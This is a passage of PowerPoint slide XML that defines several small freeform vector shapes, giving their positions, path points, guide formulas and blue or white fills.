              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10276" name="Freeform 357"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1611312" y="7670800"/>
            <a:ext cx="11113" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 5"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 5"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 5"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10277" name="Freeform 358"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="7462838"/>
            <a:ext cx="42863" cy="207962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T10" fmla="*/ 0 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T12" fmla="*/ 0 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 92"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T39" fmla="*/ 0 h 92"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T41" fmla="*/ 0 h 92"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T43" fmla="*/ 0 h 92"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T45" fmla="*/ 0 h 92"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T47" fmla="*/ 0 h 92"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T49" fmla="*/ 0 h 92"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 92"/>
              <a:gd name="T80" fmla="*/ 19 w 19"/>
              <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10278" name="Freeform 359"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1728787" y="7435850"/>
            <a:ext cx="60325" cy="233363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 0 h 103"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T28" fmla="*/ 0 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T35" fmla="*/ 0 h 103"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 27"/>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103"/>
              <a:gd name="T59" fmla="*/ 27 w 27"/>
              <a:gd name="T60" fmla="*/ 103 h 10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103">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10279" name="Freeform 360"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="7475538"/>
            <a:ext cx="41275" cy="179387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T10" fmla="*/ 0 w 18"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T43" fmla="*/ 0 h 80"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T45" fmla="*/ 0 h 80"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T47" fmla="*/ 0 h 80"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 80"/>
              <a:gd name="T80" fmla="*/ 18 w 18"/>
              <a:gd name="T81" fmla="*/ 80 h 8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 h="80">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10280" name="Freeform 361"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1509712" y="7488238"/>
            <a:ext cx="31750" cy="155575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T10" fmla="*/ 0 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T12" fmla="*/ 0 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 0 h 69"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 0 h 69"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 0 h 69"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 0 h 69"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T47" fmla="*/ 0 h 69"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T49" fmla="*/ 0 h 69"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 69"/>
              <a:gd name="T80" fmla="*/ 14 w 14"/>
              <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                <a:moveTo>
                  <a:pt x="5" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10281" name="Freeform 362"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="7499350"/>
            <a:ext cx="26987" cy="127000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
